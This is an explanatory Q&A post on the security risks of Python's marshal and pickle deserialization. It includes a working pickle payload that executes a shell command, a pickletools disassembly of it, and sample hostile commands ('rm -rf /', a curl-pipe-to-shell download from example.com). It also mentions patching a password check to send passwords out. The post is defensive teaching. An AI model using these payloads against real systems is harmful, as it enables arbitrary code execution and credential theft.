I work on a project where I use cPickle
to load files quickly. A couple of days ago I read that marshal
can be even faster than cPickle
. It works for me, but I'm curious, what is this warning from the documentation about:
Warning
The
marshal
module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source.
What could exactly happen if I'm not careful?
There are no known ways to exploit marshal
. Actually executing code when
using marshal.loads()
is not something I was able to do, and looking at the
marhal.c
source code, I don't see an immediately obvious way.
So why is this warning here? The BDFL explains:
BTW the warning for marshal is legit -- the C code that unpacks marshal data has not been carefully analyzed against buffer overflows and so on. Remember the first time someone broke into a system through a malicious JPEG? The same could happen with marshal. Seriously.
I recommend you read the rest of the discussion; a bug is shown where unmarshaling data causes Python to segfault; this has been fixed since Python 2.5 (this bug could, potentially, be abused to execute code). Other bugs may still exist, though!
Furthermore, the marshal
docs mention:
This is not a general “persistence” module. [..] The marshal module exists mainly to support reading and writing the “pseudo-compiled” code for Python modules of .pyc files.
So it's not even designed to persist data in a reliable way.
You can easily execute arbitrary code with pickle
. For example:
>>> import pickle
>>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.")
bin data download home lib64 mnt proc run srv tmp usr var
boot dev etc lib lost+found opt root sbin sys ubuntu vagrant
0
This was a harmless ls /
, but could also be a less harmless rm -rf /
, or a
curl http://example.com/hack.sh | sh
.
You can see how this works by using the pickletools
module:
>>> import pickletools
>>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'ls /'
20: t TUPLE (MARK at 11)
21: R REDUCE
22: . STOP
pickle.py
has some comments on what these opcodes mean:
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
MARK = b'(' # push special markobject on stack
STRING = b'S' # push string; NL-terminated string argument
TUPLE = b't' # build tuple from topmost stack items
REDUCE = b'R' # apply callable to argtuple, both on stack
STOP = b'.' # every pickle ends with STOP
Most of it is self-explanatory; with GLOBAL
you can get any function, and
with REDUCE
you call it.
Since Python is pretty dynamic, you can also use this to monkey-patch a program
in run-time. For example, you could change the check_password
function with
one where you upload the password to a server.
XML, json, MessagePack, ini files, or perhaps something else. It depends on which format is the best in your situation.
Has this code been "carefully analyzed against buffer overflows and so on"? Who knows. Most code hasn't, and C makes it easy to do things wrong.1 Even Python code may be vulnerable, as it may call functions implemented in C that are vulnerable.
There have been problems with Python's JSON module. But at the same
time, it's used a lot in public-facing apps, so it's probably safe. It'll
certainly be safer than marshal
, since this was only designed for .pyc
files
and explicitly comes with a "not audited!" warning.
This is of course no guarantee. Remember that YAML security hole a few years back that caused every Ruby on Rails application in the world to be vulnerable to arbitrary code execution. Oops! And this wasn't even a subtle buffer overflow, but a much more obvious problem.
Note that you should not use yaml's load()
method, as this has the
same problems as Ruby's YAML. Use safe_load()
instead.
The warning in the pickle
module is very much warranted (it should probably be
stated stronger), while the warning above the marshal
module seems to be more
of a "this code was not designed with security in mind"-type of warning, but
actually exploiting it is not as easy, and relies on the hypothetical existence
on unknown bugs. Still, you're probably better off using something else.
1 There really ought to be a "carefully analyzed against buffer overflows and so on" seal of trust for open source projects. Yeah, you can shelf out the big bucks and get your code analyzed by Veracode and such, but this is not feasible for open source projects. There is some effort to do this after the OpenSSL Heartbleed clusterfuck a few years ago in the form of the Core Infrastructure Initiative, but its scope and budget are fairly limited (but it's fairly young, and may gain traction in a few years).
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With